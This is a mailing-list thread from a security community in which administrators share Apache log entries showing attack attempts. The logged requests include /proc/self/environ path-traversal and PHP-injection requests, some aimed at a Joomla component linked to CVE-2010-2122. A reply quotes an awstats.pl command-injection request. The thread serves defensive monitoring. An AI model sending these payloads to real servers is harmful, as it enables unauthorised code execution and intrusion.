anyone else seeing an uptick in php attacks related to CVE-2010-2122

59 views

Skip to first unread message

Bob Stangarone

unread,

Dec 13, 2011, 2:02:46 PM12/13/11

to SANS Internet Storm Center / DShield

Hello all,

I've been seeing a ton of the following types of events in my apache
logs over the last few days:

[root@webserver httpd]# grep '/proc/self' * | more
access_log:cluster2.slohosting.com - - [11/Dec/2011:07:26:54 -0800]
"GET
/?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:cluster2.slohosting.com - - [11/Dec/2011:07:26:54 -0800]
"GET
/?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:cluster2.slohosting.com - - [11/Dec/2011:07:26:55 -0800]
"GET
/?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:cluster2.slohosting.com - - [11/Dec/2011:07:26:55 -0800]
"GET
/index.php?
option=com_simpledownload&controller=../../../../../../../../../../../../../../../
proc/self/environ%00
HTTP/1.1" 404 2887 "-" "
<?php system(\"id\"); ?>"
access_log:xxxcnn3219.hospedagemdesites.ws - - [11/Dec/2011:12:34:09
-0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1"
200
1005 "-" "<?php system(\"id\"); ?>"
access_log:xxxcnn3219.hospedagemdesites.ws - - [11/Dec/2011:12:34:10
-0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1"
200
1005 "-" "<?php system(\"id\"); ?>"
access_log:xxxcnn3219.hospedagemdesites.ws - - [11/Dec/2011:12:34:10
-0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200
1005 "-" "<?php system(\"id\"); ?>"
access_log:xxxcnn3219.hospedagemdesites.ws - - [11/Dec/2011:12:34:11
-0800] "GET
/index.php?
option=com_simpledownload&controller=../../../../../../../../../../../../../../../
proc/self/environ%00
HTTP/1.1" 404 28
87 "-" "<?php system(\"id\"); ?>"
access_log:60-250-15-2.hinet-ip.hinet.net - - [11/Dec/2011:15:30:27
-0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1"
200
1005 "-" "<?php system(\"id\"); ?>"
access_log:60-250-15-2.hinet-ip.hinet.net - - [11/Dec/2011:15:30:28
-0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1"
200
1005 "-" "<?php system(\"id\"); ?>"
access_log:60-250-15-2.hinet-ip.hinet.net - - [11/Dec/2011:15:30:29
-0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200
1005 "-" "<?php system(\"id\"); ?>"
access_log:60-250-15-2.hinet-ip.hinet.net - - [11/Dec/2011:15:30:33
-0800] "GET
/index.php?
option=com_simpledownload&controller=../../../../../../../../../../../../../../../
proc/self/environ%00
HTTP/1.1" 404 288
7 "-" "<?php system(\"id\"); ?>"
access_log:89-97-247-147.ip2.fastwebnet.it - - [11/Dec/2011:16:55:13
-0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1"
200
1005 "-" "<?php system(\"id\"); ?>"
access_log:89-97-247-147.ip2.fastwebnet.it - - [11/Dec/2011:16:55:13
-0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1"
200
1005 "-" "<?php system(\"id\"); ?>"
access_log:89-97-247-147.ip2.fastwebnet.it - - [11/Dec/2011:16:55:14
-0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200
1005 "-" "<?php system(\"id\"); ?>"
access_log:89-97-247-147.ip2.fastwebnet.it - - [11/Dec/2011:16:55:14
-0800] "GET
/index.php?
option=com_simpledownload&controller=../../../../../../../../../../../../../../../
proc/self/environ%00
HTTP/1.1" 404 28
87 "-" "<?php system(\"id\"); ?>"
access_log:moscovita.curimbaba.com.br - - [11/Dec/2011:20:46:48 -0800]
"GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005
"-" "<?php system(\"id\"); ?>"
access_log:moscovita.curimbaba.com.br - - [11/Dec/2011:20:46:51 -0800]
"GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005
"-" "<?php system(\"id\"); ?>"
access_log:moscovita.curimbaba.com.br - - [11/Dec/2011:20:46:53 -0800]
"GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005
"-"
"<?php system(\"id\"); ?>"
access_log:moscovita.curimbaba.com.br - - [11/Dec/2011:20:46:55 -0800]
"GET
/index.php?
option=com_simpledownload&controller=../../../../../../../../../../../../../../../
proc/self/environ%00
HTTP/1.1" 404 2887 "-
" "<?php system(\"id\"); ?>"
access_log:72.252.248.111 - - [12/Dec/2011:04:53:07 -0800] "GET
/?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:72.252.248.111 - - [12/Dec/2011:04:53:07 -0800] "GET
/?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:72.252.248.111 - - [12/Dec/2011:04:53:07 -0800] "GET
/?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:72.252.248.111 - - [12/Dec/2011:04:53:08 -0800] "GET
/index.php?
option=com_simpledownload&controller=../../../../../../../../../../../../../../../
proc/self/environ%00
HTTP/1.1" 404 2887 "-" "<?php sys
tem(\"id\"); ?>"
access_log:mail.rostcom.net - - [12/Dec/2011:11:05:24 -0800] "GET
/?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:mail.rostcom.net - - [12/Dec/2011:11:05:24 -0800] "GET
/?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:mail.rostcom.net - - [12/Dec/2011:11:05:25 -0800] "GET
/?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:mail.rostcom.net - - [12/Dec/2011:11:05:25 -0800] "GET
/index.php?
option=com_simpledownload&controller=../../../../../../../../../../../../../../../
proc/self/environ%00
HTTP/1.1" 404 2887 "-" "<?php s
ystem(\"id\"); ?>"
access_log:11.subnet118-97-50.astinet.telkom.net.id - -
[12/Dec/2011:13:16:15 -0800] "GET
/?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:11.subnet118-97-50.astinet.telkom.net.id - -
[12/Dec/2011:13:16:16 -0800] "GET
/?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:11.subnet118-97-50.astinet.telkom.net.id - -
[12/Dec/2011:13:16:16 -0800] "GET
/?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:11.subnet118-97-50.astinet.telkom.net.id - -
[12/Dec/2011:13:16:17 -0800] "GET
/index.php?
option=com_simpledownload&controller=../../../../../../../../../../../../../../../
proc/self/environ%00
HTTP/1.
1" 404 2887 "-" "<?php system(\"id\"); ?>"
access_log:188.75.195.213.ibercom.com - - [12/Dec/2011:15:39:02 -0800]
"GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005
"-" "<?php system(\"id\"); ?>"
access_log:188.75.195.213.ibercom.com - - [12/Dec/2011:15:39:05 -0800]
"GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005
"-" "<?php system(\"id\"); ?>"
access_log:188.75.195.213.ibercom.com - - [12/Dec/2011:15:39:06 -0800]
"GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005
"-"
"<?php system(\"id\"); ?>"
access_log:xs.5460.net - - [12/Dec/2011:19:07:14 -0800] "GET
/?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:xs.5460.net - - [12/Dec/2011:19:07:14 -0800] "GET
/?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:xs.5460.net - - [12/Dec/2011:19:07:15 -0800] "GET
/?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-"
"<?php system(\"id\"); ?>"
access_log:xs.5460.net - - [12/Dec/2011:19:07:15 -0800] "GET
/index.php?
option=com_simpledownload&controller=../../../../../../../../../../../../../../../
proc/self/environ%00
HTTP/1.1" 404 2887 "-" "<?php system
(\"id\"); ?>"

This is the first time I've seen these type of events in my logs.

After a bit of Google searching, I stumbled upon the following URL:

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2122

Has anyone else noticed an increase of these type of events in their
logs?

Thanks,

Bob

Richard H. Fifarek

unread,

Dec 13, 2011, 2:46:08 PM12/13/11

to iscds...@googlegroups.com

Yes, definitely seen an increase in these kind of attacks on our
systems lately. Also, seeing an increase in awstats.pl attacks
similar to:

"GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo|
HTTP/1.1"

Both of these have been around for quite a while, not sure the reason
for the increase.

> --
> Need IPv6 Training? See http://www.ipv6securitytraining.com . IPv6 Security Training
>
> To unsubscribe from this group, send email to
> iscdshield+...@googlegroups.com
> For more options, visit this group at
> http://groups.google.com/group/iscdshield?hl=en

--
Richard H. Fifarek
rfif...@gmail.com

Ray S

unread,

Dec 13, 2011, 5:23:47 PM12/13/11

to iscds...@googlegroups.com

I also have seen an increase in awstats attempts during last week seems to have gone back to normal levels.

Reply all

Reply to author

Forward

0 new messages